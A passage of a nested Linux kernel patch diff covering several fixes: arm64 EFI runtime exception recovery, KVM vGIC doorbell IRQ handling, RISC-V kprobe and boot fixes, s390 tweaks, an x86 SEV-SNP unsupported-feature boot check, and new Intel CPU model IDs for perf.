++++ b/arch/arm64/kernel/efi-rt-wrapper.S
+@@ -7,7 +7,7 @@
+ #include <asm/assembler.h>
+ 
+ SYM_FUNC_START(__efi_rt_asm_wrapper)
+-	stp	x29, x30, [sp, #-32]!
++	stp	x29, x30, [sp, #-112]!
+ 	mov	x29, sp
+ 
+ 	/*
+@@ -17,11 +17,21 @@ SYM_FUNC_START(__efi_rt_asm_wrapper)
+ 	 */
+ 	stp	x1, x18, [sp, #16]
+ 
++	/*
++	 * Preserve all callee saved registers and preserve the stack pointer
++	 * value at the base of the EFI runtime stack so we can recover from
++	 * synchronous exceptions occurring while executing the firmware
++	 * routines.
++	 */
++	stp	x19, x20, [sp, #32]
++	stp	x21, x22, [sp, #48]
++	stp	x23, x24, [sp, #64]
++	stp	x25, x26, [sp, #80]
++	stp	x27, x28, [sp, #96]
++
+ 	ldr_l	x16, efi_rt_stack_top
+ 	mov	sp, x16
+-#ifdef CONFIG_SHADOW_CALL_STACK
+-	str	x18, [sp, #-16]!
+-#endif
++	stp	x18, x29, [sp, #-16]!
+ 
+ 	/*
+ 	 * We are lucky enough that no EFI runtime services take more than
+@@ -36,10 +46,13 @@ SYM_FUNC_START(__efi_rt_asm_wrapper)
+ 	mov	x4, x6
+ 	blr	x8
+ 
++	mov	x16, sp
+ 	mov	sp, x29
++	str	xzr, [x16, #8]			// clear recorded task SP value
++
+ 	ldp	x1, x2, [sp, #16]
+ 	cmp	x2, x18
+-	ldp	x29, x30, [sp], #32
++	ldp	x29, x30, [sp], #112
+ 	b.ne	0f
+ 	ret
+ 0:
+@@ -57,3 +70,18 @@ SYM_FUNC_START(__efi_rt_asm_wrapper)
+ 
+ 	b	efi_handle_corrupted_x18	// tail call
+ SYM_FUNC_END(__efi_rt_asm_wrapper)
++
++SYM_CODE_START(__efi_rt_asm_recover)
++	mov	sp, x30
++
++	ldr_l	x16, efi_rt_stack_top		// clear recorded task SP value
++	str	xzr, [x16, #-8]
++
++	ldp	x19, x20, [sp, #32]
++	ldp	x21, x22, [sp, #48]
++	ldp	x23, x24, [sp, #64]
++	ldp	x25, x26, [sp, #80]
++	ldp	x27, x28, [sp, #96]
++	ldp	x29, x30, [sp], #112
++	ret
++SYM_CODE_END(__efi_rt_asm_recover)
+diff --git a/arch/arm64/kernel/efi.c b/arch/arm64/kernel/efi.c
+index 386bd81ca12bb..b273900f45668 100644
+--- a/arch/arm64/kernel/efi.c
++++ b/arch/arm64/kernel/efi.c
+@@ -11,6 +11,7 @@
+ #include <linux/init.h>
+ 
+ #include <asm/efi.h>
++#include <asm/stacktrace.h>
+ 
+ static bool region_is_misaligned(const efi_memory_desc_t *md)
+ {
+@@ -149,6 +150,28 @@ DEFINE_SPINLOCK(efi_rt_lock);
+ 
+ asmlinkage u64 *efi_rt_stack_top __ro_after_init;
+ 
++asmlinkage efi_status_t __efi_rt_asm_recover(void);
++
++bool efi_runtime_fixup_exception(struct pt_regs *regs, const char *msg)
++{
++	 /* Check whether the exception occurred while running the firmware */
++	if (!current_in_efi() || regs->pc >= TASK_SIZE_64)
++		return false;
++
++	pr_err(FW_BUG "Unable to handle %s in EFI runtime service\n", msg);
++	add_taint(TAINT_FIRMWARE_WORKAROUND, LOCKDEP_STILL_OK);
++	clear_bit(EFI_RUNTIME_SERVICES, &efi.flags);
++
++	regs->regs[0]	= EFI_ABORTED;
++	regs->regs[30]	= efi_rt_stack_top[-1];
++	regs->pc	= (u64)__efi_rt_asm_recover;
++
++	if (IS_ENABLED(CONFIG_SHADOW_CALL_STACK))
++		regs->regs[18] = efi_rt_stack_top[-2];
++
++	return true;
++}
++
+ /* EFI requires 8 KiB of stack space for runtime services */
+ static_assert(THREAD_SIZE >= SZ_8K);
+ 
+diff --git a/arch/arm64/kernel/stacktrace.c b/arch/arm64/kernel/stacktrace.c
+index 117e2c180f3c7..83154303e682c 100644
+--- a/arch/arm64/kernel/stacktrace.c
++++ b/arch/arm64/kernel/stacktrace.c
+@@ -5,6 +5,7 @@
+  * Copyright (C) 2012 ARM Ltd.
+  */
+ #include <linux/kernel.h>
++#include <linux/efi.h>
+ #include <linux/export.h>
+ #include <linux/ftrace.h>
+ #include <linux/sched.h>
+@@ -12,6 +13,7 @@
+ #include <linux/sched/task_stack.h>
+ #include <linux/stacktrace.h>
+ 
++#include <asm/efi.h>
+ #include <asm/irq.h>
+ #include <asm/stack_pointer.h>
+ #include <asm/stacktrace.h>
+@@ -186,6 +188,13 @@ void show_stack(struct task_struct *tsk, unsigned long *sp, const char *loglvl)
+ 			: stackinfo_get_unknown();		\
+ 	})
+ 
++#define STACKINFO_EFI						\
++	({							\
++		((task == current) && current_in_efi())		\
++			? stackinfo_get_efi()			\
++			: stackinfo_get_unknown();		\
++	})
++
+ noinline noinstr void arch_stack_walk(stack_trace_consume_fn consume_entry,
+ 			      void *cookie, struct task_struct *task,
+ 			      struct pt_regs *regs)
+@@ -199,6 +208,9 @@ noinline noinstr void arch_stack_walk(stack_trace_consume_fn consume_entry,
+ #if defined(CONFIG_VMAP_STACK) && defined(CONFIG_ARM_SDE_INTERFACE)
+ 		STACKINFO_SDEI(normal),
+ 		STACKINFO_SDEI(critical),
++#endif
++#ifdef CONFIG_EFI
++		STACKINFO_EFI,
+ #endif
+ 	};
+ 	struct unwind_state state = {
+diff --git a/arch/arm64/kvm/vgic/vgic-v3.c b/arch/arm64/kvm/vgic/vgic-v3.c
+index 826ff6f2a4e7b..5bdada3137287 100644
+--- a/arch/arm64/kvm/vgic/vgic-v3.c
++++ b/arch/arm64/kvm/vgic/vgic-v3.c
+@@ -350,26 +350,23 @@ retry:
+  * The deactivation of the doorbell interrupt will trigger the
+  * unmapping of the associated vPE.
+  */
+-static void unmap_all_vpes(struct vgic_dist *dist)
++static void unmap_all_vpes(struct kvm *kvm)
+ {
+-	struct irq_desc *desc;
++	struct vgic_dist *dist = &kvm->arch.vgic;
+ 	int i;
+ 
+-	for (i = 0; i < dist->its_vm.nr_vpes; i++) {
+-		desc = irq_to_desc(dist->its_vm.vpes[i]->irq);
+-		irq_domain_deactivate_irq(irq_desc_get_irq_data(desc));
+-	}
++	for (i = 0; i < dist->its_vm.nr_vpes; i++)
++		free_irq(dist->its_vm.vpes[i]->irq, kvm_get_vcpu(kvm, i));
+ }
+ 
+-static void map_all_vpes(struct vgic_dist *dist)
++static void map_all_vpes(struct kvm *kvm)
+ {
+-	struct irq_desc *desc;
++	struct vgic_dist *dist = &kvm->arch.vgic;
+ 	int i;
+ 
+-	for (i = 0; i < dist->its_vm.nr_vpes; i++) {
+-		desc = irq_to_desc(dist->its_vm.vpes[i]->irq);
+-		irq_domain_activate_irq(irq_desc_get_irq_data(desc), false);
+-	}
++	for (i = 0; i < dist->its_vm.nr_vpes; i++)
++		WARN_ON(vgic_v4_request_vpe_irq(kvm_get_vcpu(kvm, i),
++						dist->its_vm.vpes[i]->irq));
+ }
+ 
+ /**
+@@ -394,7 +391,7 @@ int vgic_v3_save_pending_tables(struct kvm *kvm)
+ 	 * and enabling of the doorbells have already been done.
+ 	 */
+ 	if (kvm_vgic_global_state.has_gicv4_1) {
+-		unmap_all_vpes(dist);
++		unmap_all_vpes(kvm);
+ 		vlpi_avail = true;
+ 	}
+ 
+@@ -444,7 +441,7 @@ int vgic_v3_save_pending_tables(struct kvm *kvm)
+ 
+ out:
+ 	if (vlpi_avail)
+-		map_all_vpes(dist);
++		map_all_vpes(kvm);
+ 
+ 	return ret;
+ }
+diff --git a/arch/arm64/kvm/vgic/vgic-v4.c b/arch/arm64/kvm/vgic/vgic-v4.c
+index ad06ba6c9b009..a413718be92b8 100644
+--- a/arch/arm64/kvm/vgic/vgic-v4.c
++++ b/arch/arm64/kvm/vgic/vgic-v4.c
+@@ -222,6 +222,11 @@ void vgic_v4_get_vlpi_state(struct vgic_irq *irq, bool *val)
+ 	*val = !!(*ptr & mask);
+ }
+ 
++int vgic_v4_request_vpe_irq(struct kvm_vcpu *vcpu, int irq)
++{
++	return request_irq(irq, vgic_v4_doorbell_handler, 0, "vcpu", vcpu);
++}
++
+ /**
+  * vgic_v4_init - Initialize the GICv4 data structures
+  * @kvm:	Pointer to the VM being initialized
+@@ -283,8 +288,7 @@ int vgic_v4_init(struct kvm *kvm)
+ 			irq_flags &= ~IRQ_NOAUTOEN;
+ 		irq_set_status_flags(irq, irq_flags);
+ 
+-		ret = request_irq(irq, vgic_v4_doorbell_handler,
+-				  0, "vcpu", vcpu);
++		ret = vgic_v4_request_vpe_irq(vcpu, irq);
+ 		if (ret) {
+ 			kvm_err("failed to allocate vcpu IRQ%d\n", irq);
+ 			/*
+diff --git a/arch/arm64/kvm/vgic/vgic.h b/arch/arm64/kvm/vgic/vgic.h
+index 0c8da72953f06..23e280fa0a16f 100644
+--- a/arch/arm64/kvm/vgic/vgic.h
++++ b/arch/arm64/kvm/vgic/vgic.h
+@@ -331,5 +331,6 @@ int vgic_v4_init(struct kvm *kvm);
+ void vgic_v4_teardown(struct kvm *kvm);
+ void vgic_v4_configure_vsgis(struct kvm *kvm);
+ void vgic_v4_get_vlpi_state(struct vgic_irq *irq, bool *val);
++int vgic_v4_request_vpe_irq(struct kvm_vcpu *vcpu, int irq);
+ 
+ #endif
+diff --git a/arch/arm64/mm/fault.c b/arch/arm64/mm/fault.c
+index 74f76514a48d0..3eb2825d08cff 100644
+--- a/arch/arm64/mm/fault.c
++++ b/arch/arm64/mm/fault.c
+@@ -30,6 +30,7 @@
+ #include <asm/bug.h>
+ #include <asm/cmpxchg.h>
+ #include <asm/cpufeature.h>
++#include <asm/efi.h>
+ #include <asm/exception.h>
+ #include <asm/daifflags.h>
+ #include <asm/debug-monitors.h>
+@@ -397,6 +398,9 @@ static void __do_kernel_fault(unsigned long addr, unsigned long esr,
+ 		msg = "paging request";
+ 	}
+ 
++	if (efi_runtime_fixup_exception(regs, msg))
++		return;
++
+ 	die_kernel_fault(msg, addr, esr, regs);
+ }
+ 
+diff --git a/arch/riscv/kernel/head.S b/arch/riscv/kernel/head.S
+index b865046e4dbbc..4bf6c449d78b6 100644
+--- a/arch/riscv/kernel/head.S
++++ b/arch/riscv/kernel/head.S
+@@ -326,7 +326,7 @@ clear_bss_done:
+ 	call soc_early_init
+ 	tail start_kernel
+ 
+-#if CONFIG_RISCV_BOOT_SPINWAIT
++#ifdef CONFIG_RISCV_BOOT_SPINWAIT
+ .Lsecondary_start:
+ 	/* Set trap vector to spin forever to help debug */
+ 	la a3, .Lsecondary_park
+diff --git a/arch/riscv/kernel/probes/simulate-insn.c b/arch/riscv/kernel/probes/simulate-insn.c
+index d73e96f6ed7c5..a20568bd1f1a8 100644
+--- a/arch/riscv/kernel/probes/simulate-insn.c
++++ b/arch/riscv/kernel/probes/simulate-insn.c
+@@ -71,11 +71,11 @@ bool __kprobes simulate_jalr(u32 opcode, unsigned long addr, struct pt_regs *reg
+ 	u32 rd_index = (opcode >> 7) & 0x1f;
+ 	u32 rs1_index = (opcode >> 15) & 0x1f;
+ 
+-	ret = rv_insn_reg_set_val(regs, rd_index, addr + 4);
++	ret = rv_insn_reg_get_val(regs, rs1_index, &base_addr);
+ 	if (!ret)
+ 		return ret;
+ 
+-	ret = rv_insn_reg_get_val(regs, rs1_index, &base_addr);
++	ret = rv_insn_reg_set_val(regs, rd_index, addr + 4);
+ 	if (!ret)
+ 		return ret;
+ 
+diff --git a/arch/riscv/kernel/smpboot.c b/arch/riscv/kernel/smpboot.c
+index 3373df413c882..ddb2afba6d255 100644
+--- a/arch/riscv/kernel/smpboot.c
++++ b/arch/riscv/kernel/smpboot.c
+@@ -39,7 +39,6 @@ static DECLARE_COMPLETION(cpu_running);
+ 
+ void __init smp_prepare_boot_cpu(void)
+ {
+-	init_cpu_topology();
+ }
+ 
+ void __init smp_prepare_cpus(unsigned int max_cpus)
+@@ -48,6 +47,8 @@ void __init smp_prepare_cpus(unsigned int max_cpus)
+ 	int ret;
+ 	unsigned int curr_cpuid;
+ 
++	init_cpu_topology();
++
+ 	curr_cpuid = smp_processor_id();
+ 	store_cpu_topology(curr_cpuid);
+ 	numa_store_cpu_info(curr_cpuid);
+diff --git a/arch/s390/include/asm/debug.h b/arch/s390/include/asm/debug.h
+index 77f24262c25c1..ac665b9670c5d 100644
+--- a/arch/s390/include/asm/debug.h
++++ b/arch/s390/include/asm/debug.h
+@@ -4,8 +4,8 @@
+  *
+  *    Copyright IBM Corp. 1999, 2020
+  */
+-#ifndef DEBUG_H
+-#define DEBUG_H
++#ifndef _ASM_S390_DEBUG_H
++#define _ASM_S390_DEBUG_H
+ 
+ #include <linux/string.h>
+ #include <linux/spinlock.h>
+@@ -487,4 +487,4 @@ void debug_register_static(debug_info_t *id, int pages_per_area, int nr_areas);
+ 
+ #endif /* MODULE */
+ 
+-#endif /* DEBUG_H */
++#endif /* _ASM_S390_DEBUG_H */
+diff --git a/arch/s390/kernel/vmlinux.lds.S b/arch/s390/kernel/vmlinux.lds.S
+index 5ea3830af0ccf..f81d96710595a 100644
+--- a/arch/s390/kernel/vmlinux.lds.S
++++ b/arch/s390/kernel/vmlinux.lds.S
+@@ -79,6 +79,7 @@ SECTIONS
+ 		_end_amode31_refs = .;
+ 	}
+ 
++	. = ALIGN(PAGE_SIZE);
+ 	_edata = .;		/* End of data section */
+ 
+ 	/* will be freed after init */
+@@ -193,6 +194,7 @@ SECTIONS
+ 
+ 	BSS_SECTION(PAGE_SIZE, 4 * PAGE_SIZE, PAGE_SIZE)
+ 
++	. = ALIGN(PAGE_SIZE);
+ 	_end = . ;
+ 
+ 	/*
+diff --git a/arch/s390/kvm/interrupt.c b/arch/s390/kvm/interrupt.c
+index ab569faf0df24..6d74acea5e859 100644
+--- a/arch/s390/kvm/interrupt.c
++++ b/arch/s390/kvm/interrupt.c
+@@ -83,8 +83,9 @@ static int sca_inject_ext_call(struct kvm_vcpu *vcpu, int src_id)
+ 		struct esca_block *sca = vcpu->kvm->arch.sca;
+ 		union esca_sigp_ctrl *sigp_ctrl =
+ 			&(sca->cpu[vcpu->vcpu_id].sigp_ctrl);
+-		union esca_sigp_ctrl new_val = {0}, old_val = *sigp_ctrl;
++		union esca_sigp_ctrl new_val = {0}, old_val;
+ 
++		old_val = READ_ONCE(*sigp_ctrl);
+ 		new_val.scn = src_id;
+ 		new_val.c = 1;
+ 		old_val.c = 0;
+@@ -95,8 +96,9 @@ static int sca_inject_ext_call(struct kvm_vcpu *vcpu, int src_id)
+ 		struct bsca_block *sca = vcpu->kvm->arch.sca;
+ 		union bsca_sigp_ctrl *sigp_ctrl =
+ 			&(sca->cpu[vcpu->vcpu_id].sigp_ctrl);
+-		union bsca_sigp_ctrl new_val = {0}, old_val = *sigp_ctrl;
++		union bsca_sigp_ctrl new_val = {0}, old_val;
+ 
++		old_val = READ_ONCE(*sigp_ctrl);
+ 		new_val.scn = src_id;
+ 		new_val.c = 1;
+ 		old_val.c = 0;
+@@ -126,16 +128,18 @@ static void sca_clear_ext_call(struct kvm_vcpu *vcpu)
+ 		struct esca_block *sca = vcpu->kvm->arch.sca;
+ 		union esca_sigp_ctrl *sigp_ctrl =
+ 			&(sca->cpu[vcpu->vcpu_id].sigp_ctrl);
+-		union esca_sigp_ctrl old = *sigp_ctrl;
++		union esca_sigp_ctrl old;
+ 
++		old = READ_ONCE(*sigp_ctrl);
+ 		expect = old.value;
+ 		rc = cmpxchg(&sigp_ctrl->value, old.value, 0);
+ 	} else {
+ 		struct bsca_block *sca = vcpu->kvm->arch.sca;
+ 		union bsca_sigp_ctrl *sigp_ctrl =
+ 			&(sca->cpu[vcpu->vcpu_id].sigp_ctrl);
+-		union bsca_sigp_ctrl old = *sigp_ctrl;
++		union bsca_sigp_ctrl old;
+ 
++		old = READ_ONCE(*sigp_ctrl);
+ 		expect = old.value;
+ 		rc = cmpxchg(&sigp_ctrl->value, old.value, 0);
+ 	}
+diff --git a/arch/x86/boot/compressed/ident_map_64.c b/arch/x86/boot/compressed/ident_map_64.c
+index d4a314cc50d6e..321a5011042d4 100644
+--- a/arch/x86/boot/compressed/ident_map_64.c
++++ b/arch/x86/boot/compressed/ident_map_64.c
+@@ -180,6 +180,12 @@ void initialize_identity_maps(void *rmode)
+ 
+ 	/* Load the new page-table. */
+ 	write_cr3(top_level_pgt);
++
++	/*
++	 * Now that the required page table mappings are established and a
++	 * GHCB can be used, check for SNP guest/HV feature compatibility.
++	 */
++	snp_check_features();
+ }
+ 
+ static pte_t *split_large_pmd(struct x86_mapping_info *info,
+diff --git a/arch/x86/boot/compressed/misc.h b/arch/x86/boot/compressed/misc.h
+index 62208ec04ca4b..20118fb7c53bb 100644
+--- a/arch/x86/boot/compressed/misc.h
++++ b/arch/x86/boot/compressed/misc.h
+@@ -126,6 +126,7 @@ static inline void console_init(void)
+ 
+ #ifdef CONFIG_AMD_MEM_ENCRYPT
+ void sev_enable(struct boot_params *bp);
++void snp_check_features(void);
+ void sev_es_shutdown_ghcb(void);
+ extern bool sev_es_check_ghcb_fault(unsigned long address);
+ void snp_set_page_private(unsigned long paddr);
+@@ -143,6 +144,7 @@ static inline void sev_enable(struct boot_params *bp)
+ 	if (bp)
+ 		bp->cc_blob_address = 0;
+ }
++static inline void snp_check_features(void) { }
+ static inline void sev_es_shutdown_ghcb(void) { }
+ static inline bool sev_es_check_ghcb_fault(unsigned long address)
+ {
+diff --git a/arch/x86/boot/compressed/sev.c b/arch/x86/boot/compressed/sev.c
+index c93930d5ccbd0..d63ad8f99f83a 100644
+--- a/arch/x86/boot/compressed/sev.c
++++ b/arch/x86/boot/compressed/sev.c
+@@ -208,6 +208,23 @@ void sev_es_shutdown_ghcb(void)
+ 		error("Can't unmap GHCB page");
+ }
+ 
++static void __noreturn sev_es_ghcb_terminate(struct ghcb *ghcb, unsigned int set,
++					     unsigned int reason, u64 exit_info_2)
++{
++	u64 exit_info_1 = SVM_VMGEXIT_TERM_REASON(set, reason);
++
++	vc_ghcb_invalidate(ghcb);
++	ghcb_set_sw_exit_code(ghcb, SVM_VMGEXIT_TERM_REQUEST);
++	ghcb_set_sw_exit_info_1(ghcb, exit_info_1);
++	ghcb_set_sw_exit_info_2(ghcb, exit_info_2);
++
++	sev_es_wr_ghcb_msr(__pa(ghcb));
++	VMGEXIT();
++
++	while (true)
++		asm volatile("hlt\n" : : : "memory");
++}
++
+ bool sev_es_check_ghcb_fault(unsigned long address)
+ {
+ 	/* Check whether the fault was on the GHCB page */
+@@ -270,6 +287,59 @@ static void enforce_vmpl0(void)
+ 		sev_es_terminate(SEV_TERM_SET_LINUX, GHCB_TERM_NOT_VMPL0);
+ }
+ 
++/*
++ * SNP_FEATURES_IMPL_REQ is the mask of SNP features that need a
++ * guest-side implementation for the guest to function properly. If any
++ * of these features are enabled in the hypervisor but lack a guest-side
++ * implementation, the behavior of the guest is undefined and it may
++ * fail in a non-obvious way, making it difficult to debug.
++ *
++ * As the behavior of reserved feature bits is unknown, add them to the
++ * required features mask to be on the safe side.
++ */
++#define SNP_FEATURES_IMPL_REQ	(MSR_AMD64_SNP_VTOM |			\
++				 MSR_AMD64_SNP_REFLECT_VC |		\
++				 MSR_AMD64_SNP_RESTRICTED_INJ |		\
++				 MSR_AMD64_SNP_ALT_INJ |		\
++				 MSR_AMD64_SNP_DEBUG_SWAP |		\
++				 MSR_AMD64_SNP_VMPL_SSS |		\
++				 MSR_AMD64_SNP_SECURE_TSC |		\
++				 MSR_AMD64_SNP_VMGEXIT_PARAM |		\
++				 MSR_AMD64_SNP_VMSA_REG_PROTECTION |	\
++				 MSR_AMD64_SNP_RESERVED_BIT13 |		\
++				 MSR_AMD64_SNP_RESERVED_BIT15 |		\
++				 MSR_AMD64_SNP_RESERVED_MASK)
++
++/*
++ * SNP_FEATURES_PRESENT is the mask of SNP features that are implemented
++ * by the guest kernel. Whenever a new feature is implemented in the
++ * guest kernel, a corresponding bit should be added to the mask.
++ */
++#define SNP_FEATURES_PRESENT (0)
++
++void snp_check_features(void)
++{
++	u64 unsupported;
++
++	if (!(sev_status & MSR_AMD64_SEV_SNP_ENABLED))
++		return;
++
++	/*
++	 * Terminate the boot if the hypervisor has enabled any feature lacking
++	 * a guest-side implementation. Pass the unsupported features mask through
++	 * EXIT_INFO_2 of the GHCB protocol so that those features can be reported
++	 * as part of the guest boot failure.
++	 */
++	unsupported = sev_status & SNP_FEATURES_IMPL_REQ & ~SNP_FEATURES_PRESENT;
++	if (unsupported) {
++		if (ghcb_version < 2 || (!boot_ghcb && !early_setup_ghcb()))
++			sev_es_terminate(SEV_TERM_SET_GEN, GHCB_SNP_UNSUPPORTED);
++
++		sev_es_ghcb_terminate(boot_ghcb, SEV_TERM_SET_GEN,
++				      GHCB_SNP_UNSUPPORTED, unsupported);
++	}
++}
++
+ void sev_enable(struct boot_params *bp)
+ {
+ 	unsigned int eax, ebx, ecx, edx;
+diff --git a/arch/x86/events/amd/core.c b/arch/x86/events/amd/core.c
+index d6f3703e41194..4386b10682ce4 100644
+--- a/arch/x86/events/amd/core.c
++++ b/arch/x86/events/amd/core.c
+@@ -1387,7 +1387,7 @@ static int __init amd_core_pmu_init(void)
+ 		 * numbered counter following it.
+ 		 */
+ 		for (i = 0; i < x86_pmu.num_counters - 1; i += 2)
+-			even_ctr_mask |= 1 << i;
++			even_ctr_mask |= BIT_ULL(i);
+ 
+ 		pair_constraint = (struct event_constraint)
+ 				    __EVENT_CONSTRAINT(0, even_ctr_mask, 0,
+diff --git a/arch/x86/events/intel/cstate.c b/arch/x86/events/intel/cstate.c
+index a2834bc93149a..3019fb1926e35 100644
+--- a/arch/x86/events/intel/cstate.c
++++ b/arch/x86/events/intel/cstate.c
+@@ -41,6 +41,7 @@
+  *	MSR_CORE_C1_RES: CORE C1 Residency Counter
+  *			 perf code: 0x00
+  *			 Available model: SLM,AMT,GLM,CNL,ICX,TNT,ADL,RPL
++ *					  MTL
+  *			 Scope: Core (each processor core has a MSR)
+  *	MSR_CORE_C3_RESIDENCY: CORE C3 Residency Counter
+  *			       perf code: 0x01
+@@ -51,50 +52,50 @@
+  *			       perf code: 0x02
+  *			       Available model: SLM,AMT,NHM,WSM,SNB,IVB,HSW,BDW,
+  *						SKL,KNL,GLM,CNL,KBL,CML,ICL,ICX,
+- *						TGL,TNT,RKL,ADL,RPL,SPR
++ *						TGL,TNT,RKL,ADL,RPL,SPR,MTL
+  *			       Scope: Core
+  *	MSR_CORE_C7_RESIDENCY: CORE C7 Residency Counter
+  *			       perf code: 0x03
+  *			       Available model: SNB,IVB,HSW,BDW,SKL,CNL,KBL,CML,
+- *						ICL,TGL,RKL,ADL,RPL
++ *						ICL,TGL,RKL,ADL,RPL,MTL
+  *			       Scope: Core
+  *	MSR_PKG_C2_RESIDENCY:  Package C2 Residency Counter.
+  *			       perf code: 0x00
+  *			       Available model: SNB,IVB,HSW,BDW,SKL,KNL,GLM,CNL,
+  *						KBL,CML,ICL,ICX,TGL,TNT,RKL,ADL,
+- *						RPL,SPR
++ *						RPL,SPR,MTL
+  *			       Scope: Package (physical package)
+  *	MSR_PKG_C3_RESIDENCY:  Package C3 Residency Counter.
+  *			       perf code: 0x01
+  *			       Available model: NHM,WSM,SNB,IVB,HSW,BDW,SKL,KNL,
+  *						GLM,CNL,KBL,CML,ICL,TGL,TNT,RKL,
+- *						ADL,RPL
++ *						ADL,RPL,MTL
+  *			       Scope: Package (physical package)
+  *	MSR_PKG_C6_RESIDENCY:  Package C6 Residency Counter.
+  *			       perf code: 0x02
+  *			       Available model: SLM,AMT,NHM,WSM,SNB,IVB,HSW,BDW,
+  *						SKL,KNL,GLM,CNL,KBL,CML,ICL,ICX,
+- *						TGL,TNT,RKL,ADL,RPL,SPR
++ *						TGL,TNT,RKL,ADL,RPL,SPR,MTL
+  *			       Scope: Package (physical package)
+  *	MSR_PKG_C7_RESIDENCY:  Package C7 Residency Counter.
+  *			       perf code: 0x03
+  *			       Available model: NHM,WSM,SNB,IVB,HSW,BDW,SKL,CNL,
+- *						KBL,CML,ICL,TGL,RKL,ADL,RPL
++ *						KBL,CML,ICL,TGL,RKL,ADL,RPL,MTL
+  *			       Scope: Package (physical package)
+  *	MSR_PKG_C8_RESIDENCY:  Package C8 Residency Counter.
+  *			       perf code: 0x04
+  *			       Available model: HSW ULT,KBL,CNL,CML,ICL,TGL,RKL,
+- *						ADL,RPL
++ *						ADL,RPL,MTL
+  *			       Scope: Package (physical package)
+  *	MSR_PKG_C9_RESIDENCY:  Package C9 Residency Counter.
+  *			       perf code: 0x05
+  *			       Available model: HSW ULT,KBL,CNL,CML,ICL,TGL,RKL,
+- *						ADL,RPL
++ *						ADL,RPL,MTL
+  *			       Scope: Package (physical package)
+  *	MSR_PKG_C10_RESIDENCY: Package C10 Residency Counter.
+  *			       perf code: 0x06
+  *			       Available model: HSW ULT,KBL,GLM,CNL,CML,ICL,TGL,
+- *						TNT,RKL,ADL,RPL
++ *						TNT,RKL,ADL,RPL,MTL
+  *			       Scope: Package (physical package)
+  *
+  */
+@@ -686,6 +687,8 @@ static const struct x86_cpu_id intel_cstates_match[] __initconst = {
+ 	X86_MATCH_INTEL_FAM6_MODEL(RAPTORLAKE,		&adl_cstates),
+ 	X86_MATCH_INTEL_FAM6_MODEL(RAPTORLAKE_P,	&adl_cstates),
+ 	X86_MATCH_INTEL_FAM6_MODEL(RAPTORLAKE_S,	&adl_cstates),
++	X86_MATCH_INTEL_FAM6_MODEL(METEORLAKE,		&adl_cstates),
++	X86_MATCH_INTEL_FAM6_MODEL(METEORLAKE_L,	&adl_cstates),
+ 	{ },
+ };
+ MODULE_DEVICE_TABLE(x86cpu, intel_cstates_match);
+diff --git a/arch/x86/events/intel/uncore.c b/arch/x86/events/intel/uncore.c
+index 6f1ccc57a6921..459b1aafd4d4a 100644
+--- a/arch/x86/events/intel/uncore.c
++++ b/arch/x86/events/intel/uncore.c
+@@ -1833,6 +1833,7 @@ static const struct x86_cpu_id intel_uncore_match[] __initconst = {
+ 	X86_MATCH_INTEL_FAM6_MODEL(RAPTORLAKE_P,	&adl_uncore_init),
+ 	X86_MATCH_INTEL_FAM6_MODEL(RAPTORLAKE_S,	&adl_uncore_init),
+ 	X86_MATCH_INTEL_FAM6_MODEL(SAPPHIRERAPIDS_X,	&spr_uncore_init),
++	X86_MATCH_INTEL_FAM6_MODEL(EMERALDRAPIDS_X,	&spr_uncore_init),
+ 	X86_MATCH_INTEL_FAM6_MODEL(ATOM_TREMONT_D,	&snr_uncore_init),
+ 	{},
+ };
+diff --git a/arch/x86/events/msr.c b/arch/x86/events/msr.c
+index ecced3a52668a..c65d8906cbcf4 100644
+--- a/arch/x86/events/msr.c
++++ b/arch/x86/events/msr.c
+@@ -69,6 +69,7 @@ static bool test_intel(int idx, void *data)
+ 	case INTEL_FAM6_BROADWELL_G:
+ 	case INTEL_FAM6_BROADWELL_X:
+ 	case INTEL_FAM6_SAPPHIRERAPIDS_X:
++	case INTEL_FAM6_EMERALDRAPIDS_X:
+ 
+ 	case INTEL_FAM6_ATOM_SILVERMONT:
+ 	case INTEL_FAM6_ATOM_SILVERMONT_D:
+@@ -107,6 +108,8 @@ static bool test_intel(int idx, void *data)
+ 	case INTEL_FAM6_RAPTORLAKE:
+ 	case INTEL_FAM6_RAPTORLAKE_P:
+ 	case INTEL_FAM6_RAPTORLAKE_S:
++	case INTEL_FAM6_METEORLAKE:
++	case INTEL_FAM6_METEORLAKE_L:
+ 		if (idx == PERF_MSR_SMI || idx == PERF_MSR_PPERF)
+ 			return true;
+ 		break;
+diff --git a/arch/x86/include/asm/acpi.h b/arch/x86/include/asm/acpi.h
+index 65064d9f7fa6e..8eb74cf386dbe 100644
+--- a/arch/x86/include/asm/acpi.h
++++ b/arch/x86/include/asm/acpi.h
+@@ -14,6 +14,7 @@
+ #include <asm/mmu.h>
+ #include <asm/mpspec.h>
+ #include <asm/x86_init.h>
++#include <asm/cpufeature.h>
+ 
+ #ifdef CONFIG_ACPI_APEI
+ # include <asm/pgtable_types.h>
+@@ -63,6 +64,13 @@ extern int (*acpi_suspend_lowlevel)(void);
+ /* Physical address to resume after wakeup */
+ unsigned long acpi_get_wakeup_address(void);
+ 
++static inline bool acpi_skip_set_wakeup_address(void)
++{
++	return cpu_feature_enabled(X86_FEATURE_XENPV);
++}
++
++#define acpi_skip_set_wakeup_address acpi_skip_set_wakeup_address
++
+ /*
+  * Check if the CPU can handle C2 and deeper
+  */
+diff --git a/arch/x86/include/asm/msr-index.h b/arch/x86/include/asm/msr-index.h
+index 4a2af82553e4f..91447f018f6e4 100644
+--- a/arch/x86/include/asm/msr-index.h
++++ b/arch/x86/include/asm/msr-index.h
+@@ -571,6 +571,26 @@
+ #define MSR_AMD64_SEV_ES_ENABLED	BIT_ULL(MSR_AMD64_SEV_ES_ENABLED_BIT)
+ #define MSR_AMD64_SEV_SNP_ENABLED	BIT_ULL(MSR_AMD64_SEV_SNP_ENABLED_BIT)
+ 
++/* SNP feature bits enabled by the hypervisor */
++#define MSR_AMD64_SNP_VTOM			BIT_ULL(3)
++#define MSR_AMD64_SNP_REFLECT_VC		BIT_ULL(4)
++#define MSR_AMD64_SNP_RESTRICTED_INJ		BIT_ULL(5)
++#define MSR_AMD64_SNP_ALT_INJ			BIT_ULL(6)
++#define MSR_AMD64_SNP_DEBUG_SWAP		BIT_ULL(7)
++#define MSR_AMD64_SNP_PREVENT_HOST_IBS		BIT_ULL(8)
++#define MSR_AMD64_SNP_BTB_ISOLATION		BIT_ULL(9)
++#define MSR_AMD64_SNP_VMPL_SSS			BIT_ULL(10)
++#define MSR_AMD64_SNP_SECURE_TSC		BIT_ULL(11)
++#define MSR_AMD64_SNP_VMGEXIT_PARAM		BIT_ULL(12)
